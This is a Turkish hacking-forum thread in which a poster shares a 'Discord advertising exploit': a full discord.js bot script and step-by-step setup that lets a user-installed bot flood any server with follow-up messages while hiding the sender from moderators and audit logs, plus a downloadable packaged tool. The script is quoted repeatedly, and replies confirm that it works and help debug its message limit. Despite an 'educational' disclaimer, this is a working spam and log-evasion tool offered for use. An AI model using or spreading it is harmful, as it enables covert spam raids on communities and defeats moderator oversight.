(Platform: Discord - Reklam Açığı) Büyük Sunucularda Reklam Yapılabilir!

MPT-76 · 20 Şub 2025

Discord - Reklam Açığı (YÜKSEK)

Giriş

Öncelikle konunun amacı bilgilendirme ve eğitim olmaktadır. Kötüye kullanmak yerine sunucularınızda önlem alabilirsiniz.

Nasıl Bir Sistem İşliyor?

Discord.js 14.16.0 ile gelen özellik sebebiyle bu reklam açığı yaşanmaktadır. Gelen güncellemeyle birlikte discord botlarını yalnızca sunuculara değil, profillerinizede ekleyebilirsiniz. Profillerinize bu botları eklediğiniz zaman komutlarını sunucularda, dm kutunuzda kullanabilirsiniz.

Fakat sadece mesaj gönderme komutlarına izin verilmektedir. Ayrıca sunucu ve kanal izinlerinde "Harici uygulamaların kullanılmasına izin ver" özelliğinin açık olması gerekmektedir. Eğer açık değilse mesajlar sadece kullanan kişiye gözükecek şekilde gidecektir.

Sorun Nerede?

"Harici uygulamaların kullanılmasına izin ver" özeliiği her sunucuda varsayılan olarak açık bulunmaktadır.
Bir kod yazarak reklam spamı yapılabiliyor ve çoğu kişi bu açığı bilmediği için bunlar ücretli servis olarak satılıyor. Bunun üzerinden para kazanılıyor ve büyük sunuculara reklam yapılıyor.

Nasıl Yapılır? - Önemli Noktalar

Kodu yazdım, bu sadece eğitim amaçlıdır. Komutu kullanan kişiyi botun mesajına follow-up yaparak gizliyoruz. Bu sayede denetim kaydında mesajı silsek bile gözükmediği için sunucu yöneticilerine yakalanmıyoruz.

1. Adım: Discord Developer Portal üzerinden kendinize bot oluşturunuz.
2. Adım: Kurulum sekmesine giriniz. Ardından "Kullanıcı Kurulumu" tikleyiniz.
3. Adım: Aldığınız link ile botu kendi hesabınıza ekleyin.
4. Adım: İndir Programı indiriniz.
5. Adım: Programı çalıştırın ve bot tokenini giriniz.

Komut çalıştırılıyor:

Eğer sunucuda özellik kapatıldıysa:

Denetim Kaydı ve Loglanma

İlk olarak mesajı gizli olarak atıyoruz ve follow-up yöntemiyle spamlıyoruz. Bu sayede ilk mesaj yok olduğu için mesajın sahibi bulunamaz ve loglanamaz hale gelmektedir.

| Sürüm | Modül | Açıklama | Durum |
|--------|------------------|----------------------------|-------------|
| v1.0 | Anka Red Team - Discord Exploit | Tek Botlu Reklam Spamı | Yayında | İndir
| v1.1 | Anka Red Team - Discord Exploit | Çoklu Reklam Spamı | Planlandı |

Virustotal: Tıkla

SORUMLULUK REDDİ:

Kodlar tarafımda eğitim amaçlı yazılmıştır. Kötü amaçlı kullanmamanız önemle rica olunur.
Sorumluluk kullananlara ait olmaktadır. Durum discord'a iletilmiştir.

slowbaskan123 · 20 Şub 2025

MPT-76' Alıntı:
Discord - Reklam Açığı

Giriş

Öncelikle konunun amacı bilgilendirme ve eğitim olmaktadır. Kötüye kullanmak yerine sunucularınızda önlem alabilirsiniz.

Nasıl Bir Sistem İşliyor?

Discord.js 14.16.0 ile gelen özellik sebebiyle bu reklam açığı yaşanmaktadır. Gelen güncellemeyle birlikte discord botlarını yalnızca sunuculara değil, profillerinizede ekleyebilirsiniz. Profillerinize bu botları eklediğiniz zaman komutlarını sunucularda, dm kutunuzda kullanabilirsiniz.

Fakat sadece mesaj gönderme komutlarına izin verilmektedir. Ayrıca sunucu ve kanal izinlerinde "Harici uygulamaların kullanılmasına izin ver" özelliğinin açık olması gerekmektedir. Eğer açık değilse mesajlar sadece kullanan kişiye gözükecek şekilde gidecektir.

Sorun Nerede?

"Harici uygulamaların kullanılmasına izin ver" özeliiği her sunucuda varsayılan olarak açık bulunmaktadır.
Bir kod yazarak reklam spamı yapılabiliyor ve çoğu kişi bu açığı bilmediği için bunlar ücretli servis olarak satılıyor. Bunun üzerinden para kazanılıyor ve büyük sunuculara reklam yapılıyor.

Nasıl Yapılır? - Önemli Noktalar

Kodu yazdım, bu sadece eğitim amaçlıdır. Komutu kullanan kişiyi botun mesajına follow-up yaparak gizliyoruz. Bu sayede denetim kaydında mesajı silsek bile gözükmediği için sunucu yöneticilerine yakalanmıyoruz.

1. Adım: Discord Developer Portal üzerinden kendinize bot oluşturunuz.
2. Adım: Kurulum sekmesine giriniz. Ardından "Kullanıcı Kurulumu" tikleyiniz.
3. Adım: Aldığınız link ile botu kendi hesabınıza ekleyin.
4. Adım: Bilgisayarınıza javascript ortamı olan node.js'yi ve kod editörü olan Visual Studio Code'yi kurun.
5. Adım: Bir klasör oluşturun ve bu klasörü Visual Studio Code ile açınız.
6. Adım: Terminali açarak npm i discord.js yazınız.
7. Adım: main.js isimli bir dosya oluşturunuz. İçine alttaki kodu giriniz.

JavaScript:

//TURKHACKTEAM.ORG / MPT-76 const { Client, GatewayIntentBits, SlashCommandBuilder, REST, Routes } = require('discord.js'); const client = new Client({ intents: [GatewayIntentBits.Guilds, GatewayIntentBits.MessageContent, GatewayIntentBits.DirectMessages, GatewayIntentBits.DirectMessageTyping, GatewayIntentBits.DirectMessagePolls] }); const commandData = new SlashCommandBuilder() .setName('send') .setDescription('Reklam açığı') .setIntegrationTypes(0, 1) .setContexts(0) .addStringOption(option => option.setName('message') .setDescription('Gönderilecek mesaj') .setRequired(true)) .addStringOption(option => option.setName('count') .setDescription('Gönderilecek mesaj sayısı') .setRequired(true)); const token = "TOKEN GİRİNİZ" client.once('ready', async () => { console.log(`Bot ${client.user.tag} olarak giriş yaptı`); const rest = new REST({ version: '10' }).setToken(token); try { console.log('Slash komutları yenileniyor...'); await rest.put( Routes.applicationCommands(client.user.id), { body: [commandData.toJSON()] } ); console.log('Slash komutları başarıyla yenilendi.'); } catch (error) { console.error('Komut kaydetme hatası:', error); } }); client.on('interactionCreate', async interaction => { if (!interaction.isChatInputCommand()) return; if (interaction.commandName === 'send') { const messageContent = interaction.options.getString('message'); try { const countt = interaction.options.getString('count'); let count = 1; await interaction.reply({ content: `Mesajlar atılıyor...`, ephemeral: true }); for (let i = 0; i < countt; i++) { count++; await interaction.followUp({ content: messageContent }); } } catch (error) { console.error('İşlem hatası:', error); await interaction.reply({ content: 'Bir hata oluştu!' }); } } }); process.on('unhandledRejection', error => { return console.log(error); }); process.on('uncaughtException', error => { return console.log(error); }) client.login(token);

8. Adım: node main.js yazarak kodunuzu çalıştırınız. Herhangi bir sunucuya gidip /send yazın komutunuz çıkacaktır.

Komut çalıştırılıyor:

Eğer sunucuda özellik kapatıldıysa:

SORUMLULUK REDDİ:

Kodlar tarafımda eğitim amaçlı yazılmıştır. Kötü amaçlı kullanmamanız önemle rica olunur.
Sorumluluk kullananlara ait olmaktadır. Durum discord'a iletilmiştir.

İlginç bir açık, elinize sağlık.

alexandre20 · 20 Şub 2025

oo günaydınlar efendim
adamlar bununla verified badge'ı olan botları kullanarak büyük server'ları raid'ledi kaç ay önce.

MPT-76 · 20 Şub 2025

alexandre20' Alıntı:
oo günaydınlar efendim
adamlar bununla verified badge'ı olan botları kullanarak büyük server'ları raid'ledi kaç ay önce.

O zamanda fazla bilinmesede Orientation yöntemiyle kullanıldı o açıkta. Discord fixledi, şu anki yeni yöntem üstteki gibi olmakta. Eski kullanılan kod şu anda çalışmamakta.

'TE0MAN · 20 Şub 2025

MPT-76' Alıntı:
Discord - Reklam Açığı (YÜKSEK)

Giriş

Öncelikle konunun amacı bilgilendirme ve eğitim olmaktadır. Kötüye kullanmak yerine sunucularınızda önlem alabilirsiniz.

Nasıl Bir Sistem İşliyor?

Discord.js 14.16.0 ile gelen özellik sebebiyle bu reklam açığı yaşanmaktadır. Gelen güncellemeyle birlikte discord botlarını yalnızca sunuculara değil, profillerinizede ekleyebilirsiniz. Profillerinize bu botları eklediğiniz zaman komutlarını sunucularda, dm kutunuzda kullanabilirsiniz.

Fakat sadece mesaj gönderme komutlarına izin verilmektedir. Ayrıca sunucu ve kanal izinlerinde "Harici uygulamaların kullanılmasına izin ver" özelliğinin açık olması gerekmektedir. Eğer açık değilse mesajlar sadece kullanan kişiye gözükecek şekilde gidecektir.

Sorun Nerede?

"Harici uygulamaların kullanılmasına izin ver" özeliiği her sunucuda varsayılan olarak açık bulunmaktadır.
Bir kod yazarak reklam spamı yapılabiliyor ve çoğu kişi bu açığı bilmediği için bunlar ücretli servis olarak satılıyor. Bunun üzerinden para kazanılıyor ve büyük sunuculara reklam yapılıyor.

Nasıl Yapılır? - Önemli Noktalar

Kodu yazdım, bu sadece eğitim amaçlıdır. Komutu kullanan kişiyi botun mesajına follow-up yaparak gizliyoruz. Bu sayede denetim kaydında mesajı silsek bile gözükmediği için sunucu yöneticilerine yakalanmıyoruz.

1. Adım: Discord Developer Portal üzerinden kendinize bot oluşturunuz.
2. Adım: Kurulum sekmesine giriniz. Ardından "Kullanıcı Kurulumu" tikleyiniz.
3. Adım: Aldığınız link ile botu kendi hesabınıza ekleyin.
4. Adım: Bilgisayarınıza javascript ortamı olan node.js'yi ve kod editörü olan Visual Studio Code'yi kurun.
5. Adım: Bir klasör oluşturun ve bu klasörü Visual Studio Code ile açınız.
6. Adım: Terminali açarak npm i discord.js yazınız.
7. Adım: main.js isimli bir dosya oluşturunuz. İçine alttaki kodu giriniz.

JavaScript:

//TURKHACKTEAM.ORG / MPT-76 const { Client, GatewayIntentBits, SlashCommandBuilder, REST, Routes } = require('discord.js'); const client = new Client({ intents: [GatewayIntentBits.Guilds, GatewayIntentBits.MessageContent, GatewayIntentBits.DirectMessages, GatewayIntentBits.DirectMessageTyping, GatewayIntentBits.DirectMessagePolls] }); const commandData = new SlashCommandBuilder() .setName('send') .setDescription('Reklam açığı') .setIntegrationTypes(0, 1) .setContexts(0) .addStringOption(option => option.setName('message') .setDescription('Gönderilecek mesaj') .setRequired(true)) .addStringOption(option => option.setName('count') .setDescription('Gönderilecek mesaj sayısı') .setRequired(true)); const token = "TOKEN GİRİNİZ" client.once('ready', async () => { console.log(`Bot ${client.user.tag} olarak giriş yaptı`); const rest = new REST({ version: '10' }).setToken(token); try { console.log('Slash komutları yenileniyor...'); await rest.put( Routes.applicationCommands(client.user.id), { body: [commandData.toJSON()] } ); console.log('Slash komutları başarıyla yenilendi.'); } catch (error) { console.error('Komut kaydetme hatası:', error); } }); client.on('interactionCreate', async interaction => { if (!interaction.isChatInputCommand()) return; if (interaction.commandName === 'send') { const messageContent = interaction.options.getString('message'); try { const countt = interaction.options.getString('count'); let count = 1; await interaction.reply({ content: `Mesajlar atılıyor...`, ephemeral: true }); for (let i = 0; i < countt; i++) { count++; await interaction.followUp({ content: messageContent }); } } catch (error) { console.error('İşlem hatası:', error); await interaction.reply({ content: 'Bir hata oluştu!' }); } } }); process.on('unhandledRejection', error => { return console.log(error); }); process.on('uncaughtException', error => { return console.log(error); }) client.login(token);

8. Adım: node main.js yazarak kodunuzu çalıştırınız. Herhangi bir sunucuya gidip /send yazın komutunuz çıkacaktır.

Komut çalıştırılıyor:

Eğer sunucuda özellik kapatıldıysa:

Denetim Kaydı ve Loglanma

İlk olarak mesajı gizli olarak atıyoruz ve follow-up yöntemiyle spamlıyoruz. Bu sayede ilk mesaj yok olduğu için mesajın sahibi bulunamaz ve loglanamaz hale gelmektedir.

SORUMLULUK REDDİ:

Kodlar tarafımda eğitim amaçlı yazılmıştır. Kötü amaçlı kullanmamanız önemle rica olunur.
Sorumluluk kullananlara ait olmaktadır. Durum discord'a iletilmiştir.

Eline emeğine sağlık yöntem güzel kullanılabilir.

OBT is HeRYerDe · 20 Şub 2025

Başarılı

turkishnotch323 · 20 Şub 2025

İlginç bir açık, elinize sağlık.

XXDAYSHEUS · 20 Şub 2025

Eyvallah çalışıyor

MPT-76 · 20 Şub 2025

slowbaskan123' Alıntı:
İlginç bir açık, elinize sağlık.

'TE0MAN' Alıntı:
Eline emeğine sağlık yöntem güzel kullanılabilir.

OBT is HeRYerDe' Alıntı:
Başarılı

turkishnotch323' Alıntı:
İlginç bir açık, elinize sağlık.

XXDAYSHEUS' Alıntı:
Eyvallah çalışıyor

Teşekkürler.

ZBK123 · 20 Şub 2025

MPT-76' Alıntı:
Discord - Reklam Açığı (YÜKSEK)

Giriş

Öncelikle konunun amacı bilgilendirme ve eğitim olmaktadır. Kötüye kullanmak yerine sunucularınızda önlem alabilirsiniz.

Nasıl Bir Sistem İşliyor?

Discord.js 14.16.0 ile gelen özellik sebebiyle bu reklam açığı yaşanmaktadır. Gelen güncellemeyle birlikte discord botlarını yalnızca sunuculara değil, profillerinizede ekleyebilirsiniz. Profillerinize bu botları eklediğiniz zaman komutlarını sunucularda, dm kutunuzda kullanabilirsiniz.

Fakat sadece mesaj gönderme komutlarına izin verilmektedir. Ayrıca sunucu ve kanal izinlerinde "Harici uygulamaların kullanılmasına izin ver" özelliğinin açık olması gerekmektedir. Eğer açık değilse mesajlar sadece kullanan kişiye gözükecek şekilde gidecektir.

Sorun Nerede?

"Harici uygulamaların kullanılmasına izin ver" özeliiği her sunucuda varsayılan olarak açık bulunmaktadır.
Bir kod yazarak reklam spamı yapılabiliyor ve çoğu kişi bu açığı bilmediği için bunlar ücretli servis olarak satılıyor. Bunun üzerinden para kazanılıyor ve büyük sunuculara reklam yapılıyor.

Nasıl Yapılır? - Önemli Noktalar

Kodu yazdım, bu sadece eğitim amaçlıdır. Komutu kullanan kişiyi botun mesajına follow-up yaparak gizliyoruz. Bu sayede denetim kaydında mesajı silsek bile gözükmediği için sunucu yöneticilerine yakalanmıyoruz.

1. Adım: Discord Developer Portal üzerinden kendinize bot oluşturunuz.
2. Adım: Kurulum sekmesine giriniz. Ardından "Kullanıcı Kurulumu" tikleyiniz.
3. Adım: Aldığınız link ile botu kendi hesabınıza ekleyin.
4. Adım: Bilgisayarınıza javascript ortamı olan node.js'yi ve kod editörü olan Visual Studio Code'yi kurun.
5. Adım: Bir klasör oluşturun ve bu klasörü Visual Studio Code ile açınız.
6. Adım: Terminali açarak npm i discord.js yazınız.
7. Adım: main.js isimli bir dosya oluşturunuz. İçine alttaki kodu giriniz.

JavaScript:

//TURKHACKTEAM.ORG / MPT-76 const { Client, GatewayIntentBits, SlashCommandBuilder, REST, Routes } = require('discord.js'); const client = new Client({ intents: [GatewayIntentBits.Guilds, GatewayIntentBits.MessageContent, GatewayIntentBits.DirectMessages, GatewayIntentBits.DirectMessageTyping, GatewayIntentBits.DirectMessagePolls] }); const commandData = new SlashCommandBuilder() .setName('send') .setDescription('Reklam açığı') .setIntegrationTypes(0, 1) .setContexts(0) .addStringOption(option => option.setName('message') .setDescription('Gönderilecek mesaj') .setRequired(true)) .addStringOption(option => option.setName('count') .setDescription('Gönderilecek mesaj sayısı') .setRequired(true)); const token = "TOKEN GİRİNİZ" client.once('ready', async () => { console.log(`Bot ${client.user.tag} olarak giriş yaptı`); const rest = new REST({ version: '10' }).setToken(token); try { console.log('Slash komutları yenileniyor...'); await rest.put( Routes.applicationCommands(client.user.id), { body: [commandData.toJSON()] } ); console.log('Slash komutları başarıyla yenilendi.'); } catch (error) { console.error('Komut kaydetme hatası:', error); } }); client.on('interactionCreate', async interaction => { if (!interaction.isChatInputCommand()) return; if (interaction.commandName === 'send') { const messageContent = interaction.options.getString('message'); try { const countt = interaction.options.getString('count'); let count = 1; await interaction.reply({ content: `Mesajlar atılıyor...`, ephemeral: true }); for (let i = 0; i < countt; i++) { count++; await interaction.followUp({ content: messageContent }); } } catch (error) { console.error('İşlem hatası:', error); await interaction.reply({ content: 'Bir hata oluştu!' }); } } }); process.on('unhandledRejection', error => { return console.log(error); }); process.on('uncaughtException', error => { return console.log(error); }) client.login(token);

8. Adım: node main.js yazarak kodunuzu çalıştırınız. Herhangi bir sunucuya gidip /send yazın komutunuz çıkacaktır.

Komut çalıştırılıyor:

Eğer sunucuda özellik kapatıldıysa:

Denetim Kaydı ve Loglanma

İlk olarak mesajı gizli olarak atıyoruz ve follow-up yöntemiyle spamlıyoruz. Bu sayede ilk mesaj yok olduğu için mesajın sahibi bulunamaz ve loglanamaz hale gelmektedir.

SORUMLULUK REDDİ:

Kodlar tarafımda eğitim amaçlı yazılmıştır. Kötü amaçlı kullanmamanız önemle rica olunur.
Sorumluluk kullananlara ait olmaktadır. Durum discord'a iletilmiştir.

İlginç

swenreyiz · 20 Şub 2025

Elinize sağlık, şöyle bir sorun olur ben diyeyim. Bu kod sadece 5 tane mesaj gönderebilir çünkü discord reply sınırı 5 ile sınırlı. Mesaj gönderiyor yazısına sürekli reply atmaya çalışıyor her mesajda bot.

MPT-76 · 20 Şub 2025

swenreyiz' Alıntı:
Elinize sağlık, şöyle bir sorun olur ben diyeyim. Bu kod sadece 5 tane mesaj gönderebilir çünkü discord reply sınırı 5 ile sınırlı. Mesaj gönderiyor yazısına sürekli reply atmaya çalışıyor her mesajda bot.

Şu an onunla ilgileniyorum. Programa çeviriyorum sistemi, ayrıca bir açık daha buldum. Yakın zamanda paylaşım yapacağım.

Extazİ · 20 Şub 2025

MPT-76' Alıntı:
Discord - Reklam Açığı (YÜKSEK)

Giriş

Öncelikle konunun amacı bilgilendirme ve eğitim olmaktadır. Kötüye kullanmak yerine sunucularınızda önlem alabilirsiniz.

Nasıl Bir Sistem İşliyor?

Discord.js 14.16.0 ile gelen özellik sebebiyle bu reklam açığı yaşanmaktadır. Gelen güncellemeyle birlikte discord botlarını yalnızca sunuculara değil, profillerinizede ekleyebilirsiniz. Profillerinize bu botları eklediğiniz zaman komutlarını sunucularda, dm kutunuzda kullanabilirsiniz.

Fakat sadece mesaj gönderme komutlarına izin verilmektedir. Ayrıca sunucu ve kanal izinlerinde "Harici uygulamaların kullanılmasına izin ver" özelliğinin açık olması gerekmektedir. Eğer açık değilse mesajlar sadece kullanan kişiye gözükecek şekilde gidecektir.

Sorun Nerede?

"Harici uygulamaların kullanılmasına izin ver" özeliiği her sunucuda varsayılan olarak açık bulunmaktadır.
Bir kod yazarak reklam spamı yapılabiliyor ve çoğu kişi bu açığı bilmediği için bunlar ücretli servis olarak satılıyor. Bunun üzerinden para kazanılıyor ve büyük sunuculara reklam yapılıyor.

Nasıl Yapılır? - Önemli Noktalar

Kodu yazdım, bu sadece eğitim amaçlıdır. Komutu kullanan kişiyi botun mesajına follow-up yaparak gizliyoruz. Bu sayede denetim kaydında mesajı silsek bile gözükmediği için sunucu yöneticilerine yakalanmıyoruz.

1. Adım: Discord Developer Portal üzerinden kendinize bot oluşturunuz.
2. Adım: Kurulum sekmesine giriniz. Ardından "Kullanıcı Kurulumu" tikleyiniz.
3. Adım: Aldığınız link ile botu kendi hesabınıza ekleyin.
4. Adım: Bilgisayarınıza javascript ortamı olan node.js'yi ve kod editörü olan Visual Studio Code'yi kurun.
5. Adım: Bir klasör oluşturun ve bu klasörü Visual Studio Code ile açınız.
6. Adım: Terminali açarak npm i discord.js yazınız.
7. Adım: main.js isimli bir dosya oluşturunuz. İçine alttaki kodu giriniz.

JavaScript:

//TURKHACKTEAM.ORG / MPT-76 const { Client, GatewayIntentBits, SlashCommandBuilder, REST, Routes } = require('discord.js'); const client = new Client({ intents: [GatewayIntentBits.Guilds, GatewayIntentBits.MessageContent, GatewayIntentBits.DirectMessages, GatewayIntentBits.DirectMessageTyping, GatewayIntentBits.DirectMessagePolls] }); const commandData = new SlashCommandBuilder() .setName('send') .setDescription('Reklam açığı') .setIntegrationTypes(0, 1) .setContexts(0) .addStringOption(option => option.setName('message') .setDescription('Gönderilecek mesaj') .setRequired(true)) .addStringOption(option => option.setName('count') .setDescription('Gönderilecek mesaj sayısı') .setRequired(true)); const token = "TOKEN GİRİNİZ" client.once('ready', async () => { console.log(`Bot ${client.user.tag} olarak giriş yaptı`); const rest = new REST({ version: '10' }).setToken(token); try { console.log('Slash komutları yenileniyor...'); await rest.put( Routes.applicationCommands(client.user.id), { body: [commandData.toJSON()] } ); console.log('Slash komutları başarıyla yenilendi.'); } catch (error) { console.error('Komut kaydetme hatası:', error); } }); client.on('interactionCreate', async interaction => { if (!interaction.isChatInputCommand()) return; if (interaction.commandName === 'send') { const messageContent = interaction.options.getString('message'); try { const countt = interaction.options.getString('count'); let count = 1; await interaction.reply({ content: `Mesajlar atılıyor...`, ephemeral: true }); for (let i = 0; i < countt; i++) { count++; await interaction.followUp({ content: messageContent }); } } catch (error) { console.error('İşlem hatası:', error); await interaction.reply({ content: 'Bir hata oluştu!' }); } } }); process.on('unhandledRejection', error => { return console.log(error); }); process.on('uncaughtException', error => { return console.log(error); }) client.login(token);

8. Adım: node main.js yazarak kodunuzu çalıştırınız. Herhangi bir sunucuya gidip /send yazın komutunuz çıkacaktır.

Komut çalıştırılıyor:

Eğer sunucuda özellik kapatıldıysa:

Denetim Kaydı ve Loglanma

İlk olarak mesajı gizli olarak atıyoruz ve follow-up yöntemiyle spamlıyoruz. Bu sayede ilk mesaj yok olduğu için mesajın sahibi bulunamaz ve loglanamaz hale gelmektedir.

SORUMLULUK REDDİ:

Kodlar tarafımda eğitim amaçlı yazılmıştır. Kötü amaçlı kullanmamanız önemle rica olunur.
Sorumluluk kullananlara ait olmaktadır. Durum discord'a iletilmiştir.

İlginç ve güzel açık

MPT-76 · 20 Şub 2025

Program olarak güncellendi. ++

Açık düzeltilmediği takdirde gelişmiş versiyonu yayınlanacaktır.

swenreyiz · 20 Şub 2025

MPT-76' Alıntı:
Program olarak güncellendi. ++

Açık düzeltilmediği takdirde gelişmiş versiyonu yayınlanacaktır.

Elinize sağlık hocam. DÜZENLEME: Türkçe karakterler gözükmüyor. Kod çalışıyor ancak 5 mesajdan sonra şu hatayı veriyor:

Mesaj gönderme hatası: This interaction has hit the maximum number of follow up messages

Uncaught Exception: Error [InteractionAlreadyReplied]: The reply to this interaction has already been sent or deferred.

Türkçe karakterlerin gözükmediğine dair ekran görüntüsü:

BlackDynamite · 20 Şub 2025

Evet bu gördüm her sunucuda var bildiğin

MPT-76 · 20 Şub 2025

swenreyiz' Alıntı:
Elinize sağlık hocam. DÜZENLEME: Türkçe karakterler gözükmüyor. Kod çalışıyor ancak 5 mesajdan sonra şu hatayı veriyor:

Türkçe karakterlerin gözükmediğine dair ekran görüntüsü:

Türkçe karakter için düzenleme sağlayacağım. Hata için şu anda komutu tekrar çalıştırabilirsiniz. Maksimum 5 yanıt hakkı var botun.

Sürüm V1.0 Güncellendi:

- Türkçe Dil sorunu giderildi
- Bilinen hatalar giderildi

Alparslan' · 21 Şub 2025

Eline sağlık

schawn · 21 Şub 2025

olayı ne tam olarak

Andreas25 · 21 Şub 2025

MPT-76' Alıntı:
Discord - Reklam Açığı (YÜKSEK)

Giriş

Öncelikle konunun amacı bilgilendirme ve eğitim olmaktadır. Kötüye kullanmak yerine sunucularınızda önlem alabilirsiniz.

Nasıl Bir Sistem İşliyor?

Discord.js 14.16.0 ile gelen özellik sebebiyle bu reklam açığı yaşanmaktadır. Gelen güncellemeyle birlikte discord botlarını yalnızca sunuculara değil, profillerinizede ekleyebilirsiniz. Profillerinize bu botları eklediğiniz zaman komutlarını sunucularda, dm kutunuzda kullanabilirsiniz.

Fakat sadece mesaj gönderme komutlarına izin verilmektedir. Ayrıca sunucu ve kanal izinlerinde "Harici uygulamaların kullanılmasına izin ver" özelliğinin açık olması gerekmektedir. Eğer açık değilse mesajlar sadece kullanan kişiye gözükecek şekilde gidecektir.

Sorun Nerede?

"Harici uygulamaların kullanılmasına izin ver" özeliiği her sunucuda varsayılan olarak açık bulunmaktadır.
Bir kod yazarak reklam spamı yapılabiliyor ve çoğu kişi bu açığı bilmediği için bunlar ücretli servis olarak satılıyor. Bunun üzerinden para kazanılıyor ve büyük sunuculara reklam yapılıyor.

Nasıl Yapılır? - Önemli Noktalar

Kodu yazdım, bu sadece eğitim amaçlıdır. Komutu kullanan kişiyi botun mesajına follow-up yaparak gizliyoruz. Bu sayede denetim kaydında mesajı silsek bile gözükmediği için sunucu yöneticilerine yakalanmıyoruz.

1. Adım: Discord Developer Portal üzerinden kendinize bot oluşturunuz.
2. Adım: Kurulum sekmesine giriniz. Ardından "Kullanıcı Kurulumu" tikleyiniz.
3. Adım: Aldığınız link ile botu kendi hesabınıza ekleyin.
4. Adım: İndir Programı indiriniz.
5. Adım: Programı çalıştırın ve bot tokenini giriniz.

Komut çalıştırılıyor:

Eğer sunucuda özellik kapatıldıysa:

Denetim Kaydı ve Loglanma

İlk olarak mesajı gizli olarak atıyoruz ve follow-up yöntemiyle spamlıyoruz. Bu sayede ilk mesaj yok olduğu için mesajın sahibi bulunamaz ve loglanamaz hale gelmektedir.

| Sürüm | Modül | Açıklama | Durum |
|--------|------------------|----------------------------|-------------|
| v1.0 | Anka Red Team - Discord Exploit | Tek Botlu Reklam Spamı | Yayında | İndir
| v1.1 | Anka Red Team - Discord Exploit | Çoklu Reklam Spamı | Planlandı |

Virustotal: Tıkla

SORUMLULUK REDDİ:

Kodlar tarafımda eğitim amaçlı yazılmıştır. Kötü amaçlı kullanmamanız önemle rica olunur.
Sorumluluk kullananlara ait olmaktadır. Durum discord'a iletilmiştir.

Eline sağlık hocam

(Platform: Discord - Reklam Açığı) Büyük Sunucularda Reklam Yapılabilir!

Uzman üye

Kıdemli Üye

Uzman üye

Uzman üye

Moderatör

Kıdemli Üye

Üye

Yeni üye

Uzman üye

Katılımcı Üye

Üye

Uzman üye

Anka Team

Uzman üye

Üye

Kıdemli Üye

Uzman üye

Hain

Üye

Üye